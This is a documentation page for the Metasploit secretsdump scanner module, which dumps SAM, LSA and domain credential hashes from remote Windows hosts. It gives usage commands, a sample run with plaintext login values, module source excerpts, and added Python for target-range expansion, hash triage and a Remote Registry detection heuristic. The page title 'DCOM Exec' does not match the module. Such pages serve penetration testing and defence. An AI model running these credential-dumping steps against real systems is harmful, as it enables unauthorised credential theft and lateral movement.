DCOM Exec - Metasploit
This page contains detailed information about how to use the auxiliary/scanner/smb/impacket/secretsdump metasploit module. For a list of all Metasploit modules, visit the Metasploit Module Library.
Module Overview
Name: DCOM Exec
Module: auxiliary/scanner/smb/impacket/secretsdump
Source code: modules/auxiliary/scanner/smb/impacket/secretsdump.py
Disclosure date: -
Last modification time: 2021-05-17 17:04:49 +0000
Supported architecture(s): -
Supported platform(s): -
Target service / protocol: -
Target network port(s): -
List of CVEs: -
This module is also known as secretsdump.py.
Performs various techniques to dump hashes from the remote machine without executing any agent there. For SAM and LSA Secrets (including cached creds) we try to read as much as we can from the registry and then we save the hives in the target system (%SYSTEMROOT%\Temp dir) and read the rest of the data from there.
Module Ranking and Traits
Module Ranking:
- normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.
Basic Usage
This module is a scanner module, and is capable of testing against multiple hosts. It is not passive: with the credentials supplied it enables and starts the RemoteRegistry service on each target where that service is disabled or stopped, saves copies of the hives under %SYSTEMROOT%\Temp, and reverts the service state during cleanup, as the Scenarios output further down shows.
msf > use auxiliary/scanner/smb/impacket/secretsdump
msf auxiliary(secretsdump) > show options
... show and set options ...
msf auxiliary(secretsdump) > set RHOSTS ip-range
msf auxiliary(secretsdump) > exploit
Other examples of setting the RHOSTS option:
Example 1:
msf auxiliary(secretsdump) > set RHOSTS 192.168.1.3-192.168.1.200
Example 2:
msf auxiliary(secretsdump) > set RHOSTS 192.168.1.1/24
Example 3:
msf auxiliary(secretsdump) > set RHOSTS file:/tmp/ip_list.txt
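The three RHOSTS forms above (dashed range, CIDR, and a hosts file) are expanded by Metasploit before the scan starts. The following Python is an added example, not Metasploit's own range walker, that expands the same three forms so you can count and sanity-check a target list before handing it to the module; its choice to skip the network and broadcast addresses of a CIDR block is the example's own and says nothing about how Metasploit itself treats them.

```python
import ipaddress


def expand_rhosts_text(text):
    """Expand the contents of a 'file:<path>' hosts file: one RHOSTS token per
    line, blank lines and '#' comments ignored. Tokens may themselves be
    ranges or CIDR blocks."""
    hosts = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        hosts.extend(expand_rhosts(line))
    return hosts


def expand_rhosts(spec):
    """Expand one RHOSTS token into an ordered list of IPv4 address strings.

    Forms handled, matching the examples on this page:
      192.168.1.3-192.168.1.200   dashed range, both ends inclusive
      192.168.1.1/24              CIDR; host bits are ignored, so 192.168.1.0/24
      file:/tmp/ip_list.txt       hosts file, one token per line
    plus a single address. Network and broadcast addresses of a CIDR block
    are skipped (ipaddress.hosts()); this is the example's choice.
    """
    spec = spec.strip()
    if spec.startswith("file:"):
        with open(spec[len("file:"):], "r", encoding="utf-8") as fh:
            return expand_rhosts_text(fh.read())
    if "/" in spec:
        net = ipaddress.ip_network(spec, strict=False)
        return [str(ip) for ip in net.hosts()]
    if "-" in spec:
        lo_s, hi_s = spec.split("-", 1)
        lo = ipaddress.ip_address(lo_s.strip())
        hi = ipaddress.ip_address(hi_s.strip())
        if hi < lo:
            raise ValueError(f"range start is after range end: {spec}")
        return [str(ipaddress.ip_address(n)) for n in range(int(lo), int(hi) + 1)]
    return [str(ipaddress.ip_address(spec))]


if __name__ == "__main__":
    for token in ("192.168.1.3-192.168.1.200", "192.168.1.1/24", "192.168.90.11"):
        hosts = expand_rhosts(token)
        print(f"{token:28} -> {len(hosts):4} host(s), first {hosts[0]}, last {hosts[-1]}")
```

Because every host in the list gets authenticated to and has its RemoteRegistry service touched, counting the expansion first is a cheap way to avoid scanning a /16 by mistake.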
Required Options
RHOSTS: The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
SMBPass: The password for the specified username
SMBUser: The username to authenticate as
Knowledge Base
Verification Steps
- Install Impacket v0.9.17 from GitHub. The impacket package must be in Python's module path, so "import impacket" works from any directory.
- Install pycrypto v2.7 (the experimental release). Impacket requires this specific version.
- Start msfconsole
- Do: use auxiliary/scanner/smb/impacket/secretsdump
- Set: RHOSTS, SMBUser, SMBPass
- Do: run
- See hashes from the remote machine
Scenarios
metasploit-framework (S:0 J:1) auxiliary(scanner/smb/impacket/secretsdump) > show options
Module options (auxiliary/scanner/smb/impacket/secretsdump):
Name Current Setting Required Description
---- --------------- -------- -----------
ExecMethod smbexec yes The method to use for execution (Accepted: smbexec, wmiexec, mmcexec)
OutputFile no Write the results to a file
RHOSTS 192.168.90.11 yes The target address range or CIDR identifier
SMBDomain . no The Windows domain to use for authentication
SMBPass wakawaka yes The password for the specified username
SMBUser spencer yes The username to authenticate as
THREADS 1 yes The number of concurrent threads
metasploit-framework (S:0 J:1) auxiliary(scanner/smb/impacket/secretsdump) > run
[*] [2018.04.04-17:15:45] Running for 192.168.90.11...
[*] [2018.04.04-17:15:45] 192.168.90.11 - Service RemoteRegistry is in stopped state
[*] [2018.04.04-17:15:45] 192.168.90.11 - Service RemoteRegistry is disabled, enabling it
[*] [2018.04.04-17:15:45] 192.168.90.11 - Starting service RemoteRegistry
[*] [2018.04.04-17:15:46] 192.168.90.11 - Retrieving class info for JD
[*] [2018.04.04-17:15:46] 192.168.90.11 - Retrieving class info for Skew1
[*] [2018.04.04-17:15:46] 192.168.90.11 - Retrieving class info for GBG
[*] [2018.04.04-17:15:46] 192.168.90.11 - Retrieving class info for Data
[REDACTED]
[*] [2018.04.04-17:15:48] 192.168.90.11 - Cleaning up...
[*] [2018.04.04-17:15:48] 192.168.90.11 - Stopping service RemoteRegistry
[*] [2018.04.04-17:15:48] 192.168.90.11 - Restoring the disabled state for service RemoteRegistry
[*] [2018.04.04-17:15:48] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
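The run above leaves a matching trace on the target: Windows logs a System event 7040 when a service's start type changes (here RemoteRegistry from disabled to demand start, and back), and a 7036 when the service enters the running or stopped state. The Python below is an added detection example, not part of the module or of Metasploit; it runs over constructed log records in a simple one-line-per-event format of this example's own design and flags hosts where Remote Registry was enabled, started and then re-disabled within a short window, the exact enable/start/stop/restore sequence printed in the scenario. An administrator enabling the service for good produces only the first half of that sequence, so the example scores it lower.

```python
from datetime import datetime, timedelta

SERVICE = "Remote Registry"   # display name used in the System-log service events


def parse_event(line):
    """Parse one constructed record: '<ISO ts> host=<name> id=<event id> msg=<text>'."""
    ts, host, eid, msg = line.split(" ", 3)
    return {
        "ts": datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"),
        "host": host.split("=", 1)[1],
        "id": int(eid.split("=", 1)[1]),
        "msg": msg[len("msg="):],
    }


def find_remote_registry_toggles(lines, window=timedelta(minutes=5)):
    """Flag hosts where Remote Registry was switched away from disabled (7040),
    entered the running state (7036) and, optionally, was set back to disabled
    (7040) within `window`. The full round trip is the secretsdump footprint."""
    events = [parse_event(l) for l in lines if l.strip()]
    by_host = {}
    for e in events:
        by_host.setdefault(e["host"], []).append(e)
    alerts = []
    for host in sorted(by_host):
        evs = sorted(by_host[host], key=lambda e: e["ts"])
        for i, e in enumerate(evs):
            if not (e["id"] == 7040 and SERVICE in e["msg"] and "from disabled" in e["msg"]):
                continue
            started = restored = None
            for later in evs[i + 1:]:
                if later["ts"] - e["ts"] > window:
                    break
                if later["id"] == 7036 and SERVICE in later["msg"] and "running" in later["msg"]:
                    started = later["ts"]
                elif later["id"] == 7040 and SERVICE in later["msg"] and "to disabled" in later["msg"]:
                    restored = later["ts"]
                    break
            if started is None:
                continue   # enabled but never started: reads like a config change, not a dump
            alerts.append({
                "host": host,
                "enabled_at": e["ts"],
                "severity": "high" if restored is not None else "medium",
                "seconds_enabled": None if restored is None else int((restored - e["ts"]).total_seconds()),
            })
    return alerts


# Constructed sample records, not real logs. WKS01 mirrors the scenario above
# (enable, start, stop, restore within three seconds); SRV02 is an admin turning the
# service on and leaving it on; SRV03 only starts an unrelated service.
SAMPLE_LOG = """\
2018-04-04T17:15:45Z host=WKS01 id=7040 msg=The start type of the Remote Registry service was changed from disabled to demand start.
2018-04-04T17:15:45Z host=WKS01 id=7036 msg=The Remote Registry service entered the running state.
2018-04-04T17:15:48Z host=WKS01 id=7036 msg=The Remote Registry service entered the stopped state.
2018-04-04T17:15:48Z host=WKS01 id=7040 msg=The start type of the Remote Registry service was changed from demand start to disabled.
2018-04-04T09:00:02Z host=SRV02 id=7040 msg=The start type of the Remote Registry service was changed from disabled to auto start.
2018-04-04T09:00:05Z host=SRV02 id=7036 msg=The Remote Registry service entered the running state.
2018-04-04T10:30:00Z host=SRV03 id=7036 msg=The Windows Update service entered the running state.
""".splitlines()


if __name__ == "__main__":
    for alert in find_remote_registry_toggles(SAMPLE_LOG):
        print(alert)
```

The service toggle is only one artifact; the hive copies the module writes under %SYSTEMROOT%\Temp are a second one, and a host where RemoteRegistry is already running produces no 7040 at all, so this heuristic is a starting point for a hunt rather than a complete rule.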
Msfconsole Usage
Here is how the scanner/smb/impacket/secretsdump auxiliary module looks in the msfconsole:
msf6 > use auxiliary/scanner/smb/impacket/secretsdump
msf6 auxiliary(scanner/smb/impacket/secretsdump) > show info
Name: DCOM Exec
Module: auxiliary/scanner/smb/impacket/secretsdump
License: CORE Security License (Apache 1.1)
Rank: Normal
Provided by:
Alberto Solino
Spencer McIntyre
Check supported:
No
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
ExecMethod smbexec yes The method to use for execution (Accepted: smbexec, wmiexec, mmcexec)
OutputFile no Write the results to a file
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
SMBDomain . no The Windows domain to use for authentication
SMBPass yes The password for the specified username
SMBUser yes The username to authenticate as
THREADS 1 yes The number of concurrent threads (max one per host)
Description:
Performs various techniques to dump hashes from the remote machine
without executing any agent there. For SAM and LSA Secrets
(including cached creds) we try to read as much as we can from the
registry and then we save the hives in the target system
(%SYSTEMROOT%\Temp dir) and read the rest of the data from there.
References:
https://github.com/gentilkiwi/kekeo/tree/master/dcsync
http://moyix.blogspot.com.ar/2008/02/syskey-and-sam.html
http://moyix.blogspot.com.ar/2008/02/decrypting-lsa-secrets.html
http://moyix.blogspot.com.ar/2008/02/cached-domain-credentials.html
http://www.quarkslab.com/en-blog+read+13
https://code.google.com/p/creddump/
http://lab.mediaservice.net/code/cachedump.rb
http://insecurety.net/?p=768
http://www.beginningtoseethelight.org/ntsecurity/index.htm
http://www.ntdsxtract.com/downloads/ActiveDirectoryOfflineHashDumpAndForensics.pdf
http://www.passcape.com/index.php?section=blog&cmd=details&id=15
https://github.com/CoreSecurity/impacket/blob/master/examples/secretsdump.py
Also known as:
secretsdump.py
Module Options
This is a complete list of options available in the scanner/smb/impacket/secretsdump auxiliary module:
msf6 auxiliary(scanner/smb/impacket/secretsdump) > show options
Module options (auxiliary/scanner/smb/impacket/secretsdump):
Name Current Setting Required Description
---- --------------- -------- -----------
ExecMethod smbexec yes The method to use for execution (Accepted: smbexec, wmiexec, mmcexec)
OutputFile no Write the results to a file
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
SMBDomain . no The Windows domain to use for authentication
SMBPass yes The password for the specified username
SMBUser yes The username to authenticate as
THREADS 1 yes The number of concurrent threads (max one per host)
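When OutputFile is set, the SAM and NTDS results are written in pwdump format (user:rid:lmhash:nthash:::) to files named after that prefix, while the LSA secrets go to a separate file in a different layout. The Python below is an added example, not code from the module or from Impacket, that parses a constructed file standing in for such output and applies the triage a tester does first: empty passwords, accounts that still store an LM hash, machine accounts, and users sharing an NT hash (NT hashes are unsalted, so equal hashes mean equal passwords). The two well-known empty-hash constants are real; every other hash in the sample is made-up hex.

```python
import re
from collections import namedtuple

# Well-known values: LM hash stored when LM hashing is off, and NT hash of the empty password.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

# pwdump line: user:rid:lmhash:nthash:::  (the user part may carry a DOMAIN\ prefix)
PWDUMP_RE = re.compile(
    r"^(?P<user>[^:]+):(?P<rid>\d+):(?P<lm>[0-9a-fA-F]{32}):(?P<nt>[0-9a-fA-F]{32}):::"
)

Cred = namedtuple("Cred", "user rid lm nt")


def parse_pwdump(text):
    """Return the pwdump-format lines in text as Cred records; any other line is skipped."""
    creds = []
    for line in text.splitlines():
        m = PWDUMP_RE.match(line.strip())
        if m:
            creds.append(Cred(m["user"], int(m["rid"]), m["lm"].lower(), m["nt"].lower()))
    return creds


def triage(creds):
    """Sort a dump into the findings that are reported first."""
    by_nt = {}
    report = {"empty_password": [], "lm_present": [], "machine_accounts": [], "shared_nt": {}}
    for c in creds:
        if c.nt == EMPTY_NT:
            report["empty_password"].append(c.user)
        if c.lm != EMPTY_LM:
            report["lm_present"].append(c.user)      # LM hash stored: weak and quickly cracked
        if c.user.endswith("$"):
            report["machine_accounts"].append(c.user)
        elif c.nt != EMPTY_NT:
            by_nt.setdefault(c.nt, []).append(c.user)
    report["shared_nt"] = {h: users for h, users in by_nt.items() if len(users) > 1}
    return report


# Constructed sample standing in for <OutputFile>.sam. Hashes other than the two
# constants above are invented; the last line imitates a non-pwdump secrets line
# to show that it is ignored.
SAMPLE_SAM = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:11111111222222223333333344444444:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
spencer:1001:aad3b435b51404eeaad3b435b51404ee:11111111222222223333333344444444:::
legacy:1002:55555555666666667777777788888888:99999999aaaaaaaabbbbbbbbcccccccc:::
WKS01$:1003:aad3b435b51404eeaad3b435b51404ee:ddddddddeeeeeeeeffffffff00000000:::
DefaultPassword:Summer2018!
"""


if __name__ == "__main__":
    for finding, value in triage(parse_pwdump(SAMPLE_SAM)).items():
        print(f"{finding:17} {value}")
```

The same parser works on the .ntds file from a domain controller dump, where the user field carries a DOMAIN\ prefix; the shared_nt grouping is where local-administrator password reuse across a fleet shows up.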
Advanced Options
Here is a complete list of advanced options supported by the scanner/smb/impacket/secretsdump auxiliary module:
msf6 auxiliary(scanner/smb/impacket/secretsdump) > show advanced
Module advanced options (auxiliary/scanner/smb/impacket/secretsdump):
Name Current Setting Required Description
---- --------------- -------- -----------
ShowProgress true yes Display progress messages during a scan
ShowProgressPercent 10 yes The interval in percent that progress should be shown
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
Auxiliary Actions
This is a list of all auxiliary actions that the scanner/smb/impacket/secretsdump module can do:
msf6 auxiliary(scanner/smb/impacket/secretsdump) > show actions
Auxiliary actions:
Name Description
---- -----------
Evasion Options
Here is the full list of possible evasion options supported by the scanner/smb/impacket/secretsdump auxiliary module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):
msf6 auxiliary(scanner/smb/impacket/secretsdump) > show evasion
Module evasion options:
Name Current Setting Required Description
---- --------------- -------- -----------
Error Messages
This module may fail with the following error messages. The hints -just-dc-user and -use-vss that two of them give are command-line flags of the standalone secretsdump.py; the Metasploit module exposes neither (its options are only those listed above), so when these messages appear the practical next step is to rerun with secretsdump.py directly.
- Policy SPN target name validation might be restricting full DRSUAPI dump. Try -just-dc-user
- RemoteOperations failed: %s
- SAM hashes extraction failed: %s
- LSA hashes extraction failed: %s
- ERROR_DS_DRA_BAD_DN
- ERROR_DS_NAME_ERROR_NOT_UNIQUE
- You just got that error because there might be some duplicates of the same name.
- Module dependencies (impacket) missing, cannot continue
Check for the possible causes in the code snippets below, taken from the module source code. This can often help in identifying the root cause of the problem.
Policy SPN target name validation might be restricting full DRSUAPI dump. Try -just-dc-user
Here is a relevant code snippet related to the "Policy SPN target name validation might be restricting full DRSUAPI dump. Try -just-dc-user" error message:
148: self.__canProcessSAMLSA = False
149: if str(e).find('STATUS_USER_SESSION_DELETED') and os.getenv('KRB5CCNAME') is not None \
150: and self.__doKerberos is True:
151: # Giving some hints here when SPN target name validation is set to something different to Off
152: # This will prevent establishing SMB connections using TGS for SPNs different to cifs/
153: logging.error('Policy SPN target name validation might be restricting full DRSUAPI dump. Try -just-dc-user')
154: else:
155: logging.error('RemoteOperations failed: %s' % str(e))
156:
157: # If RemoteOperations succeeded, then we can extract SAM and LSA
158: if self.__justDC is False and self.__justDCNTLM is False and self.__canProcessSAMLSA:
RemoteOperations failed: %s
Here is a relevant code snippet related to the "RemoteOperations failed: %s" error message:
150: and self.__doKerberos is True:
151: # Giving some hints here when SPN target name validation is set to something different to Off
152: # This will prevent establishing SMB connections using TGS for SPNs different to cifs/
153: logging.error('Policy SPN target name validation might be restricting full DRSUAPI dump. Try -just-dc-user')
154: else:
155: logging.error('RemoteOperations failed: %s' % str(e))
156:
157: # If RemoteOperations succeeded, then we can extract SAM and LSA
158: if self.__justDC is False and self.__justDCNTLM is False and self.__canProcessSAMLSA:
159: try:
160: if self.__isRemote is True:
SAM hashes extraction failed: %s
Here is a relevant code snippet related to the "SAM hashes extraction failed: %s" error message:
165: self.__SAMHashes = SAMHashes(SAMFileName, bootKey, isRemote=self.__isRemote, perSecretCallback=self.perSecretCallback1)
166: self.__SAMHashes.dump()
167: if self.__outputFileName is not None:
168: self.__SAMHashes.export(self.__outputFileName)
169: except Exception as e:
170: logging.error('SAM hashes extraction failed: %s' % str(e))
171:
172: try:
173: if self.__isRemote is True:
174: SECURITYFileName = self.__remoteOps.saveSECURITY()
175: else:
LSA hashes extraction failed: %s
Here is a relevant code snippet related to the "LSA hashes extraction failed: %s" error message:
183: self.__LSASecrets.exportCached(self.__outputFileName)
184: self.__LSASecrets.dumpSecrets()
185: if self.__outputFileName is not None:
186: self.__LSASecrets.exportSecrets(self.__outputFileName)
187: except Exception as e:
188: logging.error('LSA hashes extraction failed: %s' % str(e), exc_info=True)
189:
190: # NTDS Extraction we can try regardless of RemoteOperations failing. It might still work
191: if self.__isRemote is True:
192: if self.__useVSSMethod and self.__remoteOps is not None:
193: NTDSFileName = self.__remoteOps.saveNTDS()
ERROR_DS_DRA_BAD_DN
Here is a relevant code snippet related to the "ERROR_DS_DRA_BAD_DN" error message:
203: outputFileName=self.__outputFileName, justUser=self.__justUser,
204: printUserStatus=self.__printUserStatus, perSecretCallback=self.perSecretCallback2)
205: try:
206: self.__NTDSHashes.dump()
207: except Exception as e:
208: if str(e).find('ERROR_DS_DRA_BAD_DN') >= 0:
209: # We don't store the resume file if this error happened, since this error is related to lack
210: # of enough privileges to access DRSUAPI.
211: resumeFile = self.__NTDSHashes.getResumeSessionFile()
212: if resumeFile is not None:
213: os.unlink(resumeFile)
ERROR_DS_NAME_ERROR_NOT_UNIQUE
Here is a relevant code snippet related to the "ERROR_DS_NAME_ERROR_NOT_UNIQUE" error message:
210: # of enough privileges to access DRSUAPI.
211: resumeFile = self.__NTDSHashes.getResumeSessionFile()
212: if resumeFile is not None:
213: os.unlink(resumeFile)
214: logging.error(e, exc_info=True)
215: if self.__justUser and str(e).find("ERROR_DS_NAME_ERROR_NOT_UNIQUE") >=0:
216: logging.info("You just got that error because there might be some duplicates of the same name. "
217: "Try specifying the domain name for the user as well. It is important to specify it "
218: "in the form of NetBIOS domain name/user (e.g. contoso/Administratror).")
219: elif self.__useVSSMethod is False:
220: logging.info('Something wen\'t wrong with the DRSUAPI approach. Try again with -use-vss parameter')
You just got that error because there might be some duplicates of the same name.
Here is a relevant code snippet related to the "You just got that error because there might be some duplicates of the same name." error message:
211: resumeFile = self.__NTDSHashes.getResumeSessionFile()
212: if resumeFile is not None:
213: os.unlink(resumeFile)
214: logging.error(e, exc_info=True)
215: if self.__justUser and str(e).find("ERROR_DS_NAME_ERROR_NOT_UNIQUE") >=0:
216: logging.info("You just got that error because there might be some duplicates of the same name. "
217: "Try specifying the domain name for the user as well. It is important to specify it "
218: "in the form of NetBIOS domain name/user (e.g. contoso/Administratror).")
219: elif self.__useVSSMethod is False:
220: logging.info('Something wen\'t wrong with the DRSUAPI approach. Try again with -use-vss parameter')
221: self.cleanup()
Module dependencies (impacket) missing, cannot continue
Here is a relevant code snippet related to the "Module dependencies (impacket) missing, cannot continue" error message:
244: self.__NTDSHashes.finish()
245:
246:
247: def run(args):
248: if dependencies_missing:
249: module.log('Module dependencies (impacket) missing, cannot continue', level='error')
250: return
251:
252: _msf_impacket.pre_run_hook(args)
253: dumper = DumpSecrets(args['rhost'], args['SMBUser'], args['SMBPass'], args['SMBDomain'], args['OutputFile'], args['ExecMethod'])
254: try:
Related Pull Requests
- #15212 Merged Pull Request: Converts Python shebangs over to Python 3
- #12524 Merged Pull Request: Convert all python code to python3. Fixes #12506.
- #10570 Merged Pull Request: AKA Metadata Refactor
- #10107 Merged Pull Request: Add the scanner/smb/impacket/secretsdump module
References
- CVE: Not available
- https://github.com/gentilkiwi/kekeo/tree/master/dcsync
- http://moyix.blogspot.com.ar/2008/02/syskey-and-sam.html
- http://moyix.blogspot.com.ar/2008/02/decrypting-lsa-secrets.html
- http://moyix.blogspot.com.ar/2008/02/cached-domain-credentials.html
- http://www.quarkslab.com/en-blog+read+13
- https://code.google.com/p/creddump/
- http://lab.mediaservice.net/code/cachedump.rb
- http://insecurety.net/?p=768
- http://www.beginningtoseethelight.org/ntsecurity/index.htm
- http://www.ntdsxtract.com/downloads/ActiveDirectoryOfflineHashDumpAndForensics.pdf
- http://www.passcape.com/index.php?section=blog&cmd=details&id=15
- https://github.com/CoreSecurity/impacket/blob/master/examples/secretsdump.py
See Also
Check also the following modules related to this module:
Authors
- Alberto Solino
- Spencer McIntyre
Version
This page has been produced using Metasploit Framework version 6.1.24-dev. For more modules, visit the Metasploit Module Library.